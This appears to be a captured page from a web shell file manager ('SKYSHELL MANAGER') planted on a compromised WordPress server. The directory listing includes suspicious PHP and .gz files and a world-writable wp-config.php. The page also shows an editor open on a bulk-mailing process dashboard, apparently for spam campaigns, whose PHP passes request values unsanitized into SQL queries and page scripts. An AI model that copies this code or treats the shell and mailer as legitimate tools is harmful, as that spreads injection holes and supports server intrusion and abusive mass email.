📁
SKYSHELL MANAGER
PHP v8.1.29
Create
Create
Path:
root
/
var
/
www
/
html
/
wxwpsite
/
surefundeals
/
Name
Size
Perm
Actions
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.htaccess
0.51 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
222.php
15.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin.php
15.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
0.4 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
license.txt
19.44 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
readme.html
7.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
0.07 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
7.2 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-blog-header.php
0.34 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-comments-post.php
2.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-config-sample.php
3.26 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-config.php
3.54 KB
0666
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-cron.php
5.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-links-opml.php
2.43 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-load.php
3.84 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-login.php
50.66 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
8.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-scanner.gz
21.5 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-scanner.php
0.15 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-settings.php
31.88 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-signup.php
33.94 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-trackback.php
5.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-ugebuild.gz
47.66 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-ugebuild.php
0.16 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
xmlrpc.php
3.13 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
yyj.txt
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: process_content.php
<?php define('INCLUDE_CHECK',true); include_once 'connect.php'; $eid=trim($_REQUEST['eid']); $process_flag=trim($_REQUEST['pflag']); $days=trim($_REQUEST['days']); if(!$days){ $days=1; } #This condition true means generate Emp Process otherwise generate all process. if($process_flag==1) { $where_con="and emp_id='$eid'"; }else { unset($where_con); } $res=mysql_query("select * from wmail.mprocess where c_date >= DATE_SUB(NOW(), INTERVAL $days DAY) $where_con order by flag asc ,process_id desc"); while($row=mysql_fetch_array($res)) { if($row['mode']=='t') {$md='Testing';} if($row['mode']=='b') {$md='Bulk';} if($row['mode']=='d') {$md='Domain';} if($row['mode']=='w') {$md='Warm';} $tab_rows.=" <tr title='$row[offername]'> <td>$row[process_id]</td> <td>$row[u_date]</td> <td>$row[emp_id]</td> <td>$md</td> <td>$row[offer_id]</td> <td>$row[accounts]</td> <td>$row[track_id]</td> <td>$row[file_name]</td> <td>$row[sent]</td> <td>$row[from_domain]</td> <td> <table cellpadding='0' cellspacing='0'><tr> "; if($row['flag']==1) { $tab_rows.="<td><a style='text-decoration:none;' title='click to kill process' onclick='kill_Selected_Process(\"$row[process_id]\");' href='#'><span id='res_$row[process_id]' > <span class='label label-info'>Started</span></a></td>"; } if($row['flag']==2) { $tab_rows.="<td><a style='text-decoration:none;' title='click to kill process' onclick='kill_Selected_Process(\"$row[process_id]\");' href='#'><span id='res_$row[process_id]' > <span class='label label-success'>Processing</span></a></td>"; } if($row['flag']==3) { $tab_rows.="<td><a style='text-decoration:none;' href='#'><span id='res_$row[process_id]'><span class='label label-important'>Killed</span></a></td>"; } if($row['flag']==4) { $priority=select1("select priority from process_schedule where status=1 and process_id='$row[process_id]'"); $tab_rows.="<td><a style='text-decoration:none;' title='click to kill process' onclick='kill_Scheduled_Process(\"$row[process_id]\",\"$eid\");' href='#'><span id='res_$row[process_id]' > <span class='label label-teal'>Scheduled - $priority[0]</span></a></td>"; } $tab_rows.="<td><a title='Load Process to Mailing' style='text-decoration:none;' onclick='load_Process_To_Mailing(\"$row[process_id]\");' href='#'> <button class='btn btn-warning'><i class='icon-upload-alt'></i></button> </a></td>"; /*$tab_rows.="<td><a title='Load Process to Yahoo Seeding' style='text-decoration:none;' onclick='load_Yahoo_Seeding(\"$row[process_id]\");' href='#'> <button class='btn btn-warning'><i class='icon-upload-alt'></i></button> </a></td>"; */ $tab_rows.="<td><a style='text-decoration:none;' onclick='update_Process(\"$row[process_id]\");' href='#'> <i class='icon-external-link'></i> </a>"; $tab_rows.=" <button onclick='restart_Process(\"$row[process_id]\");' class='btn'> <i class='glyphicon-restart'></i></button><span id='restart_res_$row[process_id]' ></span> "; $tab_rows.="<button class='btn' title= 'Click to delete data file count' onclick='delete_DataFile(\"$row[process_id]\",\"$row[file_name]\",\"$row[sent]\");'><i class='icon-trash'></i></button><span id='delete_res_$row[process_id]' ></span>"; $tab_rows.="</td> </tr></table> </td> </tr>"; } ?> <table style='font-size:13px;width:100%;' class='table table-hover table-nomargin' id="process_tab_<?php echo $process_flag; ?>"> <thead> <tr> <th>Process Id</th> <th>Time Stamp</th> <th>Emp Id</th> <th>Mode</th> <th>Offer Id</th> <th>Account Id</th> <th>Track Id</th> <th>Data File</th> <th>Sent</th> <th>From Domain</th> <th>Status</th> </tr> </thead> <tbody > <?php echo $tab_rows; ?> </tbody> </table> <script type='text/javascript'> var path='<?php echo "$local_server/";?>'; var eid='<?php echo "$eid";?>'; var pflag='<?php echo $process_flag; ?>'; var tab_id='process_tab_'+pflag; $(document).ready(function () { $('#'+tab_id).dataTable({"aLengthMenu": [[25,50, 100,1000, -1], [25,50, 100,1000, "All"]],"iDisplayLength" : 25,"aaSorting": [[ 0, "desc" ]]}); }); //This function Update the selected process. function update_Process(pid) { var id;if(pflag==2) { id='all_'; }else { id=''; } $('#'+id+'process_li',window.parent.document).removeClass('active'); $('#'+id+'process_tab',window.parent.document).removeClass('tab-pane active').addClass('tab-pane'); $('#update_process_li',window.parent.document).addClass('active'); $('#update_process_tab',window.parent.document).addClass('tab-pane active'); $('#update_process_load_img').fadeIn(); $('#update_process_iframe',window.parent.document).attr("src", path+'/update_process.php?eid='+eid+'&pid='+pid+'&pflag='+pflag); //window.frames['update_process_iframe'].location=path+'/update_process.php?eid='+eid+'&pid='+pid; $('#update_process_load_img').fadeOut(2000); } //This function load the selected process to Mailing. /* function load_Process_To_Mailing(pid){ var id;if(pflag==2) { id='all_'; }else { id=''; } $('#'+id+'process_li',window.parent.document).removeClass('active'); $('#'+id+'process_tab',window.parent.document).removeClass('tab-pane active').addClass('tab-pane'); //$('#mailing_li',window.parent.document).addClass('active'); //$('#mailing',window.parent.document).addClass('tab-pane active'); //$('#mailing_iframe',window.parent.document).attr("src", path+'/mailing.php?eid='+eid+'&pid='+pid); $('#mailing_li',window.parent.document).addClass('active'); $('#mailing',window.parent.document).addClass('tab-pane active'); $('#yahoo_seeding_iframe',window.parent.document).attr("src", path+'/mailing.php?eid='+eid+'&pid='+pid); //$('#mailing_iframe',window.parent.document).attr("src", path+'/mailing12.php?eid='+eid+'&pid='+pid); } */ //This function load the selected process to yahoo seeding. function load_Process_To_Mailing(pid){ var id;if(pflag==2) { id='all_'; }else { id=''; } $('#'+id+'process_li',window.parent.document).removeClass('active'); $('#'+id+'process_tab',window.parent.document).removeClass('tab-pane active').addClass('tab-pane'); $('#mailing_li',window.parent.document).addClass('active'); $('#mailing',window.parent.document).addClass('tab-pane active'); $('#mailing_iframe',window.parent.document).attr("src", path+'/mailing.php?eid='+eid+'&pid='+pid); } /* //This function load the selected process values into mailing tab function viewInfo(id,eid,tid1,tid2) { var path='<?php echo $local_server; ?>'; $('#'+tid1).removeClass('active'); $('#mailing-li').addClass('active'); /// $('#'+tid2).removeClass('tab-pane active').addClass('tab-pane'); $('#mailing').addClass('tab-pane active'); //// $('#mail_res').html("<a class='btn btn-blue btn-mini' href='#' ><i class='icon-refresh icon-spin'></i> Processing... </a>"); //$('#mail_res').load(path+'/mailing.php?pid='+id+'&eid='+eid+''); $.post("mailing2.php", { pid : id , eid : eid },function( data ) { $("#mail_res").html(data); }); } */ //This function load the selected process to yahoo seeding. function load_Yahoo_Seeding(pid){ var id;if(pflag==2) { id='all_'; }else { id=''; } $('#'+id+'process_li',window.parent.document).removeClass('active'); $('#'+id+'process_tab',window.parent.document).removeClass('tab-pane active').addClass('tab-pane'); $('#yahoo_seeding-li',window.parent.document).addClass('active'); $('#yahoo_seeding',window.parent.document).addClass('tab-pane active'); $('#yahoo_seeding_iframe',window.parent.document).attr("src", path+'/yahoo_seeding.php?eid='+eid+'&pid='+pid); } //This function kill the selected process. function kill_Selected_Process(pid) { $.post("kill_process.php", { key : 1,pid : pid },function( data ) { $('#res_'+pid).html(data); }); } function kill_Scheduled_Process(pid,eid) { $.post("process_schedule.php", { key : 2,pid : pid , eid:eid },function( data ) { $('#res_'+pid).html(data); }); } function restart_Process(pid) { var flag=confirm("Are you sure to restart the Process!"); if(flag){ $.post("kill_process.php", { key : 2, pid : pid },function( data ) { $('#restart_res_'+pid).html(data); }); } } function delete_DataFile(pid,fname,scount) { var flag=confirm("Are you sure to delete!"); if(flag){ $.post("kill_process.php", { pid : pid , key : 3 ,fname:fname,scount:scount },function( data ) { $('#delete_res_'+pid).html(data); }); } } </script>
Save